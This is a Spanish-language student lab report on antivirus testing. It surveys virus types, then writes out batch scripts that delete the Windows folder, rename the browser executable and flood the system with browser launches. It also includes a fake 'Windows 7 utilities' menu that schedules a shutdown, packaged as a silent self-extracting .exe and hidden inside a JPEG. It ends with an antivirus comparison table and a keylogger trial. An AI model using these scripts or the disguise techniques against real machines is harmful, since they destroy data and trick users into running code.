ACTIVIDADES CON ANTIVIRUS
Realizar las siguientes operaciones:
1.-Comparativa antivirus.
1.1.-Para realizar la comparativa tendremos que infectar nuestra maquina con diferentes virus:
-Troyanos,
-Gusanos
-Virus residentes
La caracterstica principal de estos virus es que se ocultan en la memoria RAM de forma permanente o residente. De este modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, infectando todos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados. Algunos ejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky.
-Virus de boot (bot_kill) o de arranque
Los trminos boot o sector de arranque hacen referencia a una seccin muy importante de un disco o unidad de almacenamiento CD, DVD, memorias USB etc. En ella se guarda la informacin esencial sobre las caractersticas del disco y se encuentra un programa que permite arrancar el ordenador. Este tipo de virus no infecta ficheros, sino los discos que los contienen. Actan infectando en primer lugar el sector de arranque de los dispositivos de almacenamiento. Cuando un ordenador se pone en marcha con un dispositivo de almacenamiento, el virus de boot infectar a su vez el disco duro.
Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a ste ltimo con un disco infectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los dispositivos de almacenamiento contra escritura y no arrancar nunca el ordenador con uno de estos dispositivos desconocidos en el ordenador.
Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.
-Virus de enlace o directorio
Los ficheros se ubican en determinadas direcciones (compuestas bsicamente por unidad de disco y directorio), que el sistema operativo conoce para poder localizarlos y trabajar con ellos.
Los virus de enlace o directorio alteran las direcciones que indican donde se almacenan los ficheros. De este modo, al intentar ejecutar un programa (fichero con extensin EXE o COM) infectado por un virus de enlace, lo que se hace en realidad es ejecutar el virus, ya que ste habr modificado la direccin donde se encontraba originalmente el programa, colocndose en su lugar.
Una vez producida la infeccin, resulta imposible localizar y trabajar con los ficheros originales.
-Virus polimrficos
Son virus que en cada infeccin que realizan se cifran de una forma distinta (utilizando diferentes algoritmos y claves de cifrado). De esta forma, generan una elevada cantidad de copias de s mismos e impiden que los antivirus los localicen a travs de la bsqueda de cadenas o firmas, por lo que suelen ser los virus ms costosos de detectar.
-Virus multipartites
Virus muy avanzados, que pueden realizar mltiples infecciones, combinando diferentes tcnicas para ello. Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos, etc.
-Virus del fichero
Infectan programas o ficheros ejecutables (ficheros con extensiones EXE y COM). Al ejecutarse el programa infectado, el virus se activa, produciendo diferentes efectos.
-Virus de FAT
La tabla de asignacin de ficheros o FAT (del ingls File AllocationTable) es la seccin de un disco utilizada para enlazar la informacin contenida en ste. Se trata de un elemento fundamental en el sistema. Los virus que atacan a este elemento son especialmente peligrosos, ya que impedirn el acceso a ciertas partes del disco, donde se almacenan los ficheros crticos para el normal funcionamiento del ordenador.
1.2-Crea diferentes virus usando .bat y camuflarlo.
Crearemos varios archivos bat que realizarn acciones maliciosas en el ordenador. Para ello el proceso ser siempre el mismo. Abriremos un archivo
de texto con el Bloc de Notas pondremos el cdigo necesario y guardaremos el archivo con extensin .BAT. Por ejemplo:
Para borrar Windows.
echo off
del=c:windowsq
del=c:windows
deltree=c:windows
Para no iniciar el Explorer. Vemos que cambia el nombre del archivo
ejecutable del explorer.
@ echo off
c:
cd
cd *programa*
cd *explorer*
rename iexplore.exe iexplore.eve
exit
Para sobrecargar la memoria. Crea un bucle infinito iniciando una y otra vez el buscador Google.
@echo off
:1
start www.google.com
goto 1
Vemos un pantallazo de los tres archivos bat.
Para crear otro ejemplo de virus creado con archivos batch crearemos un men
que nos abrir distintas herramientas de Windows 7, como Registro,
Programas, Restaurar Sistema, etc. Copiamos las lneas de comandos del
archivo en las prximas lneas:
@echo off
title Selecciona un color
:inicio
cls
echo ********************
echo *****-=[MENU]=-*****
echo ********************
echo 1) Informacin Bsica del equipo
echo 2) Informacin Avanzada del equipo
echo 3) Centro de Actividades
echo 4) Administracin de equipo
echo 5) Programas
echo 6) Opciones de internet
echo 7) Monitor de Rendimiento
echo 8) Monitor de Recursos
echo 9) Administrador de Tareas
echo 10) Versin de WINDOWS
echo 11) Registro
echo 12) Solucin de Problemas
echo 13) Visor de Eventos
echo 14) Asistencia Remota
echo 15) Cambiar Configuracin UAC
echo 16) Restaurar Sistema
echo ********************
echo 17) Salir
echo ********************
echo.
set /p var=Seleccione una opcion [1-6]:
if "%var%"=="1" goto op1
if "%var%"=="2" goto op2
if "%var%"=="3" goto op3
if "%var%"=="4" goto op4
if "%var%"=="5" goto op5
if "%var%"=="6" goto op6
if "%var%"=="7" goto op7
if "%var%"=="8" goto op8
if "%var%"=="9" goto op9
if "%var%"=="10" goto op10
if "%var%"=="11" goto op11
if "%var%"=="12" goto op12
if "%var%"=="13" goto op13
if "%var%"=="14" goto op14
if "%var%"=="15" goto op15
if "%var%"=="16" goto op16
if "%var%"=="17" goto op17
if "%var%"=="17" goto salir
::Mensaje de error, validacin cuando se selecciona una opcin fuera de rango
echo. El numero "%var%" no es una opcion valida, por favor intente de nuevo.
echo.
pause
echo.
goto inicio
:op1
echo.
echo. Has elegido la opcion No. 1
echo
shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta --para la
bola--"
color 08
echo.
pause
goto inicio
:op2
echo.
echo. Has elegido la opcion No. 2
echo
shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta --para la
bola--"
color 09
echo.
pause
goto inicio
:op3
echo.
echo. Has elegido la opcion No. 3
echo.
C:\Windows\System32\wscui.cpl
color 0A
echo.
pause
goto inicio
:op4
echo.
echo. Has elegido la opcion No. 4
echo.
C:\Windows\System32\compmgmt.msc
color 0B
echo.
pause
goto inicio
:op5
echo.
echo. Has elegido la opcion No. 5
echo.
C:\Windows\System32\appwiz.cpl
color 0C
echo.
pause
goto inicio
:op6
echo.
echo. Has elegido la opcion No. 6
echo.
C:\Windows\System32\inetcpl.cpl
color 08
echo.
pause
goto inicio
:op7
echo.
echo. Has elegido la opcion No. 7
echo.
C:\Windows\System32\perfmon.exe
color 09
echo.
pause
goto inicio
:op8
echo.
echo. Has elegido la opcion No. 8
echo.
C:\Windows\System32\resmon.exe
color 0B
echo.
pause
goto inicio
:op9
echo.
echo. Has elegido la opcion No. 9
echo.
C:\Windows\System32\taskmgr.exe
color 0C
echo.
pause
goto inicio
:op10
echo.
echo. Has elegido la opcion No. 10
echo.
C:\Windows\System32\cmd.exe
color 08
echo.
pause
goto inicio
:op11
echo.
echo. Has elegido la opcion No. 11
echo.
C:\Windows\System32\regedt32.exe
color 09
echo.
pause
goto inicio
:op12
echo.
echo. Has elegido la opcion No. 12
echo.
C:\Windows\System32\control.exe /name Microsoft.Troubleshooting
color 0B
echo.
pause
goto inicio
:op10
echo.
echo. Has elegido la opcion No. 10
echo.
C:\Windows\system32\winver.exe
color 0C
echo.
pause
goto inicio
:op13
echo.
echo. Has elegido la opcion No. 13
echo.
C:\Windows\System32\eventvwr.exe
color 08
echo.
pause
goto inicio
:op14
echo.
echo. Has elegido la opcion No. 14
echo.
C:\Windows\System32\msra.exe
color 09
echo.
pause
goto inicio
:op15
echo.
echo. Has elegido la opcion No. 15
echo.
C:\Windows\System32\UserAccountControlSettings.exe
color 0B
echo.
pause
goto inicio
:op16
echo.
echo. Has elegido la opcion No. 16
echo.
C:\Windows\System32\rstrui.exe
color 0C
echo.
pause
goto inicio
:salir
@cls&exit
Lo llamaremos UTILIDADES WINDOWS 7.BAT. En las opciones 1 y 2 colocaremos un comando que nos apagar el ordenador en un tiempo determinado por nosotros.
shutdown -s -t 150 -c "Pues te apago el ordenata ... para evitarlo ejecuta --para la bola--"
Tambin nos abrir una ventana con un mensaje que nos advertir de ese hecho y la manera de evitarlo (para evitar el apagado deberemos ejecutar el archivo para la bola.bat).
Si ejecutamos el archivo para la bola.bat evitaremos el apagado del sistema.
puesto que lo hemos hecho usando el comando del Ms-Dos Shutdown, el archivo para la bola.bat tiene la orden del comando shutdown a que paraliza el apagado.
Cambiar archivo . bat a .exe.
Para camuflar el archivo UTILIDADES WINDOWS 7.BAT podemos cambiarlo a fichero .exe. Para ello utilizaremos el winrar.
Primero seleccionamos con el botn derecho el archivo UTILIDADES WINDOWS 7.BAT y elegimos "aadir al archivo"
Al hacer clic en la opcin Crear un archivo autoextrable ya vemos que nos cambia la extensin de .bat a .exe.
Despus elegimos la pestaa Avanzado y seleccionamos Autoextrable...
en la siguiente ventana que nos saldr elegimos Instalacin y en la opcin Ejecutar tras la extraccin ponemos el nombre original del archivo .bat que queremos cambiar a .exe.
Como no queremos que se
muestre la extraccin ni la ejecucin
iremos a Modos y seleccionamos
Ocultar Todo.
Tambin iremos a Actualizar y
seleccionamos Preguntar antes de
sobrescribir.
Para ponerle un icono iremos a Texto e
icono y en Examinar... seleccionamos el
que queramos.
Ahora haremos clic en Aceptar y en la siguiente ventana tambin en Aceptar. Se nos habr creado el archivo UTILIDADES WINDOWS 7.exe.
Para poder camuflar archivos en una foto debemos crear una carpeta en C:\ a la que llamaremos X. En ella pondremos una foto (koala.jpg) y los archivos que queramos ocultar, en este caso UTILIDADES WINDOWS7.exe y para la bola.bat.
Luego los seleccionamos y clicando en botn derecho pulsamos en aadir a X.rar.
Nos crear como vemos abajo el archivo X.rar. Borraremos ahora los archivos que queremos ocultar y dejamos solo la foto y el archivo comprimido que hemos creado.
Ahora abrimos el CMD vamos al directorio C:\ donde est la carpeta X luego escribimos cd X para entrar en la carpeta X y escribiremos copy /B koala.jpg + X.rar Secret.jpg. As crearemos el archivo Secret.jpt que contendr los archivos koala.jpg y X.rar
Vemos aqu el archivo recin creado Secret.jpg. Borraremos los otros dos y ya tendremos un archivo que parece una foto pero contiene otros dos archivos (UTILIDADES DE WINDOWS 7.exe y para la bola.bat).Para comprobarlo lo abriremos con winrar y vemos que estn comprimidos en Secret.jpg.
Ya solo tendremos que extraerlos del archivo secret.jpg y podremos disponer de los dos archivos . Lo vemos abajo que al extraer el contenido nos crea una carpeta llamada Secret y los extrae en ella.
Tabla programas antivirus
Calificacion #1 #2 #3 #4 #5
Bitdefender Antivirus 2015
Kaspersky Antivirus 2015
Panda Antivirus Pro 2015
McAfee Internet Security 2015
Avast Pro Antivirus
Deteccin de Malware
Cuantas amenazas detecta?
25 amenazas
Ninguna 12 amenazas detectadas
18 amenzas
A.Rpido: 11 amenazas A. Completo: 13 amenazas
Limpieza de Infeccin
Limpieza exitosa de malware activos
Todas Ninguna Todas 15 Todas
Escaneo de Velocidad
En demanda1
en segundos3 2 horas 45 minutos
Anlisis Completo: 6 horas Anlisis Rpido: 2 min. 42 seg.
Anlisis: 19 minutos 10 segundos
3 horas 13 minutos
Anlisis Completo: 1 hora 34 min. Anlisis Rpido: 22 min. 20 seg.
Interface
Es fcil? S S S S S
Kaspersky Antivirus 2015, Avast Pro Antivirus, y Panda Antivirus Pro 2015
(nosotros utilizamos el Panda Cloud Cleaner) han realizado las pruebas en un
equipo con windows Xp, Disco Duro de 40 Gb y 1 Gb de memoria RAM.
BitDefender Antivirus y McAffee Internet Security 2015 realizaron las
pruebas en un equipo con Windows XP, Disco Duro 60 Gb y 1 Gb de memoria
Ram.
2.-Busca un KEYLOGGER y ponlo en prctica.
Instalamos el Keylogger llamado Revealer Keylogger. Lo iniciamos y
pulsamos en Inicio.
Despus iniciaremos el navegador Firefox desde donde abriremos la pgina
Youtube y all abriremos el video banda sonora de El ltimo mohicano.
Despus en el bloc de notas creamos un documento con el texto Documento
confidencial para banco y Cuenta bancaria 1200-21-2345-2332232 que
guardaremos con el nombre de Cuenta del banco. Como vemos en la
pantalla de abajo en la seccin Pulsaciones de tecla ha quedado grabado
todo lo que hemos tecleado.
Para finalizar la grabacin del Keylogger solo deberamos pulsar en Detener.
Al tratarse de una versin de prueba la opcin Capturas de pantalla est
deshabilitada.
Top Related